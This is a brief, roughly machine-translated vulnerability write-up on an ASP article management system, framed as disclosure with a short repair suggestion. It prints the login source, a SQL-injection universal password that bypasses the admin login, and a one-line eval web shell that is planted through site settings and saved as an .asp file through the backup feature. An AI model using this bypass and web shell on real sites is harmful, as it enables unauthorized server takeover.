Small-nose Article management system vulnerabilities and repair

Just download an asp Website creation system "small-nose Article Management System"
After opening the file, I found that it did a good job.
By default, I tried the universal password 'or' = 'or' in the background/admin/login. asp and found that the password went in.
Let's take a look at the source code.
① Login. asp file
<%
Dim errmsg
 
Username = Request ("username ")
Password = Request ("password ")
Verifycode = Request ("verifycode ")
 
If username = "" Or password = "" Then
Response. Redirect "login. asp? Errno = 2"
Response. End
End If
 
Small nose Article Management System Vulnerability
This is one. I found that it was not filtered, and then it was strange that the verification code was converted.
If Cstr (Session ("getcode") <> Lcase (Cstr (Trim (Request ("verifycode") Then
Response. Redirect "login. asp? Errno = 0"
Response. End
End If
 
%>
 

The anti-injection file/inc/AntiAttack. asp consists of two parts:
① ----- Filter the get query value.
② ----- Filter the single value of the post table.
The post code is as follows: www.2cto.com
If request. form <> "" then
Chk_badword = split (Form_Badword ,"‖")
For each form_name2 IN Request. Form
For I = 0 to ubound (Chk_badword)
If Instr (LCase (request. form (form_name2), Chk_badword (I) <> 0 Then
Select Case Err_Message
Case "1"
Response. Write "<Script Language = JavaScript> alert ('error! The value of Form "& form_name2 &" contains an invalid string! \ N do not contain invalid characters such as % & * # () in the form! '); Window. close (); </Script>"
Case "2"
Response. Write "<Script Language = JavaScript> location. href = '" & Err_Web & "' </Script>"
Case "3"
Response. Write "<Script Language = JavaScript> alert ('error! The value of the parameter "& form_name2 &" contains an invalid string! \ N do not contain invalid characters such as % & * # () in the form! '); Location. href =' "& Err_Web &" '; </Script>"
End Select
Response. End
End If
NEXT
NEXT
End if
%>
Start with "if request. from <>"
Apparently, the user and password on the background login interface are not judged.
Therefore, you can directly log on to the background using a universal password.
 
Ii. Background upload shell
I simply checked the backup method.
 
First, back up the website and use it later.
Insert a closed sentence in "website information Settings"
%> <% Eval request ("0o1Znz1ow") %> <%
Back up xx. asp or xx. cer, etc.
Our Trojan will appear in the/DataBaseX/file.
 
Www.2cto.com repair suggestion: Strengthen the login verification in a targeted manner and enhance the authentication and filtering in the backup function area

From sentiment blog